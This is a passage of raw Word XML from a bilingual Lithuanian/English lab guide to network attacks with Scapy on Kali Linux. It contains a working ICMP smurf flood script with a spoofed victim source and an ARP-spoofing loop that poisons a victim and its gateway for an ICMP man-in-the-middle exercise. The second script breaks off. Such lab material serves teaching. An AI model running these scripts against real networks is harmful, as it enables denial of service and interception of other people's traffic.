        <w:t xml:space="preserve">Sukuriate failą “touch ICMPsmurf.py” ir jį redaguojate “nano ICMPsmurf.py”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D540D94" w14:textId="2CC83CDF" w:rsidR="00313315" w:rsidRPr="00352171" w:rsidRDefault="00313315" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8E62CB" w14:textId="62B49DF4" w:rsidR="00313315" w:rsidRPr="00313315" w:rsidRDefault="00313315" w:rsidP="00313315">
      <w:r w:rsidRPr="00352171">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">from scapy.all import * </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A70EAF9" w14:textId="4C61A909" w:rsidR="00313315" w:rsidRPr="00313315" w:rsidRDefault="00313315" w:rsidP="00313315">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00313315">
        <w:t>icmp_request = IP(src="10.0.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00313315">
        <w:t>", dst="10.0.2.255")/ICMP(type=8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763EB706" w14:textId="77777777" w:rsidR="00313315" w:rsidRPr="00313315" w:rsidRDefault="00313315" w:rsidP="00313315">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00313315">
        <w:t>send(icmp_request, count=100, verbose=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A974CDF" w14:textId="2EBA2352" w:rsidR="00313315" w:rsidRPr="00352171" w:rsidRDefault="00313315" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A75E5A5" w14:textId="5B158227" w:rsidR="00313315" w:rsidRPr="00352171" w:rsidRDefault="00313315" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* src – Aukos IP adresas</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:tab/>
        <w:t>* dst – Broadcast IP adresas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C3CFA8" w14:textId="45AF59CB" w:rsidR="00313315" w:rsidRPr="00352171" w:rsidRDefault="00313315" w:rsidP="008F0E5F">
      <w:r w:rsidRPr="00352171">
        <w:t>Išsaugote ir uždarote. Skriptą paleisti galite su “python ICMPsmurf.py”. Kaip matote, per Wireshark iš aukos IP adreso (10.0.2.5) buvo išsiųsta daug (ping) užklausų.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACE9F26" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00352171" w:rsidRDefault="00505E36" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="339A92FE" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00505E36" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:r w:rsidRPr="00505E36">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C05E919" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00352171" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:r w:rsidRPr="00505E36">
        <w:t>Create the file with touch ICMPsmurf.py and edit it using nano ICMPsmurf.py.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D447E" w14:textId="1BD0355C" w:rsidR="00505E36" w:rsidRPr="00352171" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F30AA03" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00313315" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">from scapy.all import * </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F701BD" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00313315" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00313315">
        <w:t>icmp_request = IP(src="10.0.2.</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00313315">
        <w:t>", dst="10.0.2.255")/ICMP(type=8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370AA8E5" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00313315" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:pPr>
        <w:ind w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00313315">
        <w:t>send(icmp_request, count=100, verbose=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC203D7" w14:textId="127D6B58" w:rsidR="00505E36" w:rsidRPr="00352171" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587B87F8" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00505E36" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00505E36">
        <w:t xml:space="preserve">* src – the victim's IP address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161C21E4" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00505E36" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:pPr>
        <w:ind w:left="1296" w:firstLine="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00505E36">
        <w:t xml:space="preserve">* dst – the broadcast IP address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409D73D2" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00505E36" w:rsidRDefault="00505E36" w:rsidP="00505E36"/>
    <w:p w14:paraId="19CC4CB9" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00505E36" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00505E36">
        <w:t>Save and close. You can run the script with python ICMPsmurf.py. As you can see in Wireshark, a large number of (ping) requests were sent from the victim IP address (10.0.2.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B7BDE0" w14:textId="77777777" w:rsidR="00505E36" w:rsidRPr="00352171" w:rsidRDefault="00505E36" w:rsidP="008F0E5F"/>
    <w:p w14:paraId="78329609" w14:textId="1619839D" w:rsidR="00505E36" w:rsidRPr="00352171" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>UŽduotis Nr. 11</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(Exercise 11)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603277D" w14:textId="19F72190" w:rsidR="00505E36" w:rsidRPr="00352171" w:rsidRDefault="00505E36" w:rsidP="00505E36">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>ICMP Man In The Middle ataka</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>(ICMP Man In The Middle attack)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F09AD6" w14:textId="77777777" w:rsidR="0063209D" w:rsidRPr="00352171" w:rsidRDefault="0063209D" w:rsidP="00505E36">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71AFD44D" w14:textId="6504445C" w:rsidR="0063209D" w:rsidRPr="00352171" w:rsidRDefault="0063209D" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF5C3CD" w14:textId="31077F5B" w:rsidR="0063209D" w:rsidRPr="00352171" w:rsidRDefault="0063209D" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">tai ataka, kai užpuolikas pasinaudoja ICMP protokolu (dažniausiai ICMP Redirect), kad apgautų auką ir priverstų jos tinklo srautą keliauti </w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>per užpuoliką</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>, užuot keliavus tiesiai į tikslą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A77F6E" w14:textId="77777777" w:rsidR="0063209D" w:rsidRPr="0063209D" w:rsidRDefault="0063209D" w:rsidP="0063209D">
      <w:r w:rsidRPr="0063209D">
        <w:t>EN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D08491" w14:textId="77777777" w:rsidR="0063209D" w:rsidRPr="0063209D" w:rsidRDefault="0063209D" w:rsidP="0063209D">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0063209D">
        <w:t>It's an attack where the attacker exploits the ICMP protocol (usually ICMP Redirect) to deceive the victim and force its network traffic to travel through the attacker instead of going directly to the destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62265401" w14:textId="748F969F" w:rsidR="0063209D" w:rsidRPr="00352171" w:rsidRDefault="00CB573E" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43924E84" wp14:editId="10474D67">
            <wp:extent cx="5267325" cy="1733550"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="403042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42735" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5267325" cy="1733550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AC3652" w14:textId="0403491C" w:rsidR="00CB573E" w:rsidRPr="00352171" w:rsidRDefault="00CB573E" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D18785D" wp14:editId="2EE0B9CD">
            <wp:extent cx="4371975" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="151044364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43641" name="Picture 1" descr="A computer screen shot of a computer code&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4371975" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE6F681" w14:textId="366ECED6" w:rsidR="00CB573E" w:rsidRPr="00352171" w:rsidRDefault="00CB573E" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5401CB8C" wp14:editId="241CB573">
            <wp:extent cx="6591300" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4837640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4021" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6591300" cy="1028700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEBA4A4" w14:textId="40DE4681" w:rsidR="00CB573E" w:rsidRPr="00352171" w:rsidRDefault="00CB573E" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A4394B0" wp14:editId="18E02D13">
            <wp:extent cx="6543675" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="73759599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5995" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6543675" cy="1638300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6BC1E1" w14:textId="762F5AE0" w:rsidR="00CB573E" w:rsidRPr="00352171" w:rsidRDefault="00CB573E" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11BE3079" wp14:editId="336465F5">
            <wp:extent cx="4582164" cy="1200318"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183206911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9117" name="Picture 1" descr="A computer screen shot of a program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4582164" cy="1200318"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="104F2725" w14:textId="33F32DBE" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="132EB322" wp14:editId="1EED1DF7">
            <wp:extent cx="6645910" cy="3383915"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1456247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47217" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="3383915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5886B00B" w14:textId="7B55C409" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="244E9258" wp14:editId="401BD8C5">
            <wp:extent cx="3943900" cy="1038370"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="19932652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65252" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3943900" cy="1038370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DDEC35" w14:textId="5562298C" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31E0D007" wp14:editId="05CD48C2">
            <wp:extent cx="6645910" cy="2959735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="37431540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15407" name="Picture 1" descr="A computer screen shot of a program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6645910" cy="2959735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D15C1" w14:textId="6183F73B" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:t>LT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7324F4DB" w14:textId="7B3E4170" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="0063209D">
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve">Prieš pradedant, Kali sistemoje reikia įvesti “sysctl -w net.ipv4.ip_forward=1”, kad galėtume transliuotis paketus. Tada sukuriame du failus – “touch ICMPMITM_1” ir “touch ICMPMITM_2”. Tam, kad panaudotume šiuos du skriptus vienu metu, tai mum prireiks dviejų Terminal programų mūsų Kali sistemoje. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B0C6AA" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:r w:rsidRPr="00352171">
        <w:t>Redaguojame pirmą sukurtą failą: n</w:t>
      </w:r>
      <w:r w:rsidR="005F65AB" w:rsidRPr="00352171">
        <w:t>ano ICMPMITM_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055519B7" w14:textId="24BA9347" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:br/>
        <w:t>***</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC83854" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1825C6DC" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B41D63F" w14:textId="7CD67DFE" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>victim_ip = "10.0.2.5"</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>victim_mac = "08:00:27:a9:b3:5b"</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>gateway_ip = "10.0.2.2"</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>gateway_mac = "08:00:27:62:31:48"</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>attacker_ip = "10.0.2.3"</w:t>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00352171">
        <w:t>attacker_mac = "08:00:27:1f:b7:23"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C506C7" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA1DC9C" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3898F7C2" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>ether_victim = Ether(dst=victim_mac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6591F6" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>arp_victim = ARP(op=2, psrc=gateway_ip, hwsrc=attacker_mac,  pdst=victim_ip, hwdst=victim_mac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D64F4" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>frame_victim = ether_victim/arp_victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F36D5A1" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25AE7E65" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:lastRenderedPageBreak/>
        <w:t>ether_gateway = Ether(dst=gateway_mac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233BABD" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>arp_gateway = ARP(op=2, psrc=victim_ip, hwsrc=attacker_mac, pdst=gateway_ip, hwdst=gateway_mac)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058FBA88" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>frame_gateway = ether_gateway/arp_gateway</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2041B32C" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C"/>
    <w:p w14:paraId="1383595B" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3107BEA4" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> sendp(frame_victim)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11297777" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> sendp(frame_gateway)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161F1527" w14:textId="7ED8DA8E" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t xml:space="preserve"> time.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7941B417" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60548238" w14:textId="5E6EED04" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECCC080" w14:textId="77777777" w:rsidR="005F65AB" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="005F65AB"/>
    <w:p w14:paraId="6014336D" w14:textId="0361167E" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="005F65AB" w:rsidP="005F65AB">
      <w:r w:rsidRPr="00352171">
        <w:t>Toliau redaguojame antrą failą: nano ICMPMITM_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3481A6D4" w14:textId="0779FEE9" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6157C817" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
      <w:r w:rsidRPr="00352171">
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA3F4DE" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF5D2AC" w14:textId="77777777" w:rsidR="006A432C" w:rsidRPr="00352171" w:rsidRDefault="006A432C" w:rsidP="006A432C">
      <w:pPr>
        <w:ind w:left="1296"/>
      </w:pPr>
